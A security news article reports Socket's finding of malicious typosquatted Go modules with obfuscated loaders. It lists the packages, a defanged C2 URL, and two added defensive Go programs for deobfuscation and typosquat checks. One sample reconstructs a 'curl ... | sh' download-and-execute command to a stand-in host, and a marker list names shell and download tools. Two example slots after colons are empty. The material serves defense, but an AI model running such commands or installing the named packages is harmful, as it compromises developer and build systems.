Socket’s Threat Research Team has uncovered an alarming wave of malicious Go packages—some still live on GitHub—designed to compromise developers and CI pipelines via stealthy, obfuscated loaders and live second-stage payloads.
In a campaign reminiscent of prior open-source supply chain attacks, Socket researchers have discovered eleven malicious Go modules, eight of which are typosquats, that stealthily deliver second-stage malware. The packages, available via public repositories like GitHub, contain obfuscated payload loaders designed to execute commands in-memory, bypassing disk-based detection.
“At runtime, the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command and control (C2) endpoints, and executes it in memory,” Socket reported.
This attack method is particularly dangerous due to its compatibility across platforms—affecting both Linux-based build systems and Windows workstations. Even more concerning, six out of the ten C2 URLs were still live at the time of disclosure.
The campaign leverages both typosquatting and namespace confusion to masquerade as legitimate packages. Malicious modules discovered include:
- github.com/stripedconsu/linker
- github.com/agitatedleopa/stm
- github.com/expertsandba/opt
- github.com/wetteepee/hcloud-ip-floater
- github.com/weightycine/replika
- github.com/ordinarymea/tnsr_ids
- github.com/ordinarymea/TNSR_IDS
- github.com/cavernouskina/mcp-go
- github.com/lastnymph/gouid
- github.com/sinfulsky/gouid
- github.com/briefinitia/gouid
Each package hides a dangerous command deep in its codebase, often buried after hundreds of lines. The payloads are constructed using an index-based array of string fragments that are concatenated at runtime into a shell command like:
“The obfuscation works by establishing a string array, calling different indices of the array, and constructing a command from the indices,” the researchers explained.
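The fragment-array obfuscation described above is easy to undo statically, which is how a defender can triage a suspicious module without running it. The following Go program is an added example, not Socket's tooling and not code from any of the listed modules: it parses a source file with go/ast, records every `[]string` literal bound to a name, statically evaluates `+` chains of indexed fragments back into the string they produce, and reports the result when it contains a download-and-execute marker. The `sample` source, the `markers` list and the `example.invalid` host are constructed for this example.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strconv"
	"strings"
)

// sample is a constructed file (not one of the modules named in the article)
// imitating the loader pattern: fragments in a []string, joined by index.
const sample = `package loader

var f = []string{"cu", "rl", " -s ", "https://", "example.invalid", "/p", " | ", "s", "h"}

func run() string { return f[0] + f[1] + f[2] + f[3] + f[4] + f[5] + f[6] + f[7] + f[8] }
`

// markers hint at download-and-execute behaviour (shell, curl/wget, certutil).
var markers = []string{"sh -c", "| sh", "certutil", "curl ", "wget ", "powershell"}

func suspicious(s string) bool {
	for _, m := range markers {
		if strings.Contains(strings.ToLower(s), m) {
			return true
		}
	}
	return false
}

// collectArrays maps each name declared as "var name = []T{...}" to the
// literal's elements (loaders using ":=" would also need an *ast.AssignStmt case).
func collectArrays(file *ast.File) map[string][]ast.Expr {
	arrays := map[string][]ast.Expr{}
	ast.Inspect(file, func(n ast.Node) bool {
		vs, ok := n.(*ast.ValueSpec)
		for i := 0; ok && i < len(vs.Names) && i < len(vs.Values); i++ {
			if cl, isLit := vs.Values[i].(*ast.CompositeLit); isLit {
				arrays[vs.Names[i].Name] = cl.Elts
			}
		}
		return true
	})
	return arrays
}

// resolve statically evaluates a "+" chain of indexed fragments and string
// literals: the text, the number of array lookups, and false if a leaf is not constant.
func resolve(e ast.Expr, arrays map[string][]ast.Expr) (string, int, bool) {
	switch x := e.(type) {
	case *ast.BasicLit:
		if s, err := strconv.Unquote(x.Value); err == nil {
			return s, 0, true
		}
	case *ast.BinaryExpr:
		if x.Op == token.ADD {
			l, nl, okl := resolve(x.X, arrays)
			r, nr, okr := resolve(x.Y, arrays)
			return l + r, nl + nr, okl && okr
		}
	case *ast.IndexExpr:
		id, okId := x.X.(*ast.Ident)
		lit, okLit := x.Index.(*ast.BasicLit)
		if !okId || !okLit {
			return "", 0, false
		}
		if i, err := strconv.Atoi(lit.Value); err == nil && i < len(arrays[id.Name]) {
			s, n, ok := resolve(arrays[id.Name][i], arrays)
			return s, n + 1, ok
		}
	}
	return "", 0, false
}

// Scan parses src and returns, keyed by line, each "+" chain that joins two or
// more fragments of a constant slice into a string carrying a marker.
func Scan(src string) (map[int]string, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, "input.go", src, 0)
	if err != nil {
		return nil, err
	}
	arrays, found := collectArrays(file), map[int]string{}
	ast.Inspect(file, func(n ast.Node) bool {
		be, ok := n.(*ast.BinaryExpr)
		if !ok || be.Op != token.ADD {
			return true
		}
		s, nfrag, ok := resolve(be, arrays)
		if ok && nfrag >= 2 && suspicious(s) {
			found[fset.Position(be.Pos()).Line] = s
		}
		return !ok // a resolved chain is done; a partial one may still hide a resolvable sub-chain
	})
	return found, nil
}

func main() { fmt.Println(Scan(sample)) }
```

Run with `go run`, pointing `Scan` at any vendored or freshly downloaded module source instead of `sample`; on the constructed input it reports line 5 with the reassembled `curl -s https://example.invalid/p | sh`. The `nfrag >= 2` threshold keeps ordinary string concatenation out of the output, and the marker list is deliberately short so that a team can extend it with the commands they actually see.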
Upon execution, the malware downloads a shell script which in turn pulls a malicious ELF or PE binary, depending on the operating system.
One such live script from https://monsoletter[.]icu/storage/de373d0df/f0eee999 checks for a Linux environment, sleeps for 3600 seconds (to evade sandboxes), downloads a binary, makes it executable, and runs it:
The downloaded binary (SHA256: 844013025bf7c5d01e6f48df0e990103…) reads browser data, collects system info, and communicates with external servers, establishing backdoor access to infected systems.
Other packages like replika, tnsr_ids, and gouid variants execute similar commands targeting Windows systems via certutil.exe, downloading and executing malicious EXEs in the background.
A recurring technique used by these attackers is typosquatting, where malicious packages use subtly altered names of legitimate modules.
Additionally, Go’s decentralized nature makes it difficult to distinguish legitimate packages from impostors. Developers often import modules directly from GitHub, creating ambiguous trust boundaries and increasing the risk of accidental installation.
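Because Go resolves modules by path rather than through a curated registry, a practical control is to compare every `require` entry in a go.mod against an allowlist of paths the team has already reviewed and to flag near-misses. The Go program below is an added example (not from Socket or from any of the projects named above): it extracts required module paths, then raises an alert when an unlisted path is within two edits of a trusted one (typosquatting) or reuses a trusted module's final path element under a different owner (namespace confusion). The `trusted` list, the `exampleorg` and `someoneelse` owners and the `goMod` file are all constructed; nothing here asserts who the real maintainers of these module names are.

```go
package main

import (
	"fmt"
	"strings"
)

// trusted is a constructed allowlist of module paths a team has reviewed.
// The "exampleorg" owner is a placeholder, not the real maintainer of anything.
var trusted = []string{
	"github.com/exampleorg/hcloud-ip-floater",
	"github.com/exampleorg/mcp-go",
	"github.com/exampleorg/gouid",
	"golang.org/x/crypto",
}

// goMod is a constructed go.mod with one look-alike path and one
// same-name-different-owner path next to two allowlisted modules.
const goMod = `module example.invalid/app

go 1.22

require (
	github.com/exampleorg/hcloud-ip-floater v0.3.0
	github.com/exampleorg/mcp-g0 v1.0.0
	github.com/someoneelse/gouid v1.2.0
	golang.org/x/crypto v0.21.0
)
`

// Alert says which required module looks like an impostor of which trusted one.
type Alert struct {
	Module, LooksLike, Reason string
}

// requires extracts module paths from single-line and block "require" entries.
func requires(mod string) []string {
	var out []string
	inBlock := false
	for _, line := range strings.Split(mod, "\n") {
		line = strings.TrimSpace(line)
		switch {
		case line == "require (":
			inBlock = true
		case line == ")":
			inBlock = false
		case strings.HasPrefix(line, "require "):
			out = append(out, strings.Fields(line)[1])
		case inBlock && line != "" && !strings.HasPrefix(line, "//"):
			out = append(out, strings.Fields(line)[0])
		}
	}
	return out
}

func min3(a, b, c int) int {
	if b < a {
		a = b
	}
	if c < a {
		a = c
	}
	return a
}

// editDistance is the Levenshtein distance between a and b.
func editDistance(a, b string) int {
	prev := make([]int, len(b)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(a); i++ {
		cur := make([]int, len(b)+1)
		cur[0] = i
		for j := 1; j <= len(b); j++ {
			cost := 1
			if a[i-1] == b[j-1] {
				cost = 0
			}
			cur[j] = min3(prev[j]+1, cur[j-1]+1, prev[j-1]+cost)
		}
		prev = cur
	}
	return prev[len(b)]
}

func last(path string) string { return path[strings.LastIndex(path, "/")+1:] }

// Check flags required modules that are not allowlisted but either lie within
// two edits of a trusted path (typosquat) or reuse a trusted module's final
// path element under a different owner (namespace confusion).
func Check(mod string, trusted []string) []Alert {
	allow := map[string]bool{}
	for _, t := range trusted {
		allow[t] = true
	}
	var alerts []Alert
	for _, req := range requires(mod) {
		if allow[req] {
			continue
		}
		for _, t := range trusted {
			if d := editDistance(req, t); d <= 2 {
				alerts = append(alerts, Alert{req, t, fmt.Sprintf("edit distance %d", d)})
				break
			}
			if last(req) == last(t) {
				alerts = append(alerts, Alert{req, t, "same name, different owner"})
				break
			}
		}
	}
	return alerts
}

func main() { fmt.Println(Check(goMod, trusted)) }
```

On the constructed go.mod the check raises two alerts: `mcp-g0` as one edit away from the trusted `mcp-go`, and `someoneelse/gouid` as a same-name module under an unreviewed owner. Wiring `Check` into CI against the repository's real go.mod, with the allowlist kept alongside `go.sum`, turns the ambiguous GitHub trust boundary the article describes into an explicit review step.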
While attribution remains tentative, Socket notes that seven of the ten malicious URLs share the same path structure (/storage/de373d0df/a31546bf), and multiple packages use the exact same C2 endpoints, strongly suggesting some common authorship.
“We have more confidence that certain ones are by the same threat actor due to C2 reuse and the format of the code.”
However, shared obfuscation alone is not conclusive—code reuse is common in the threat actor ecosystem.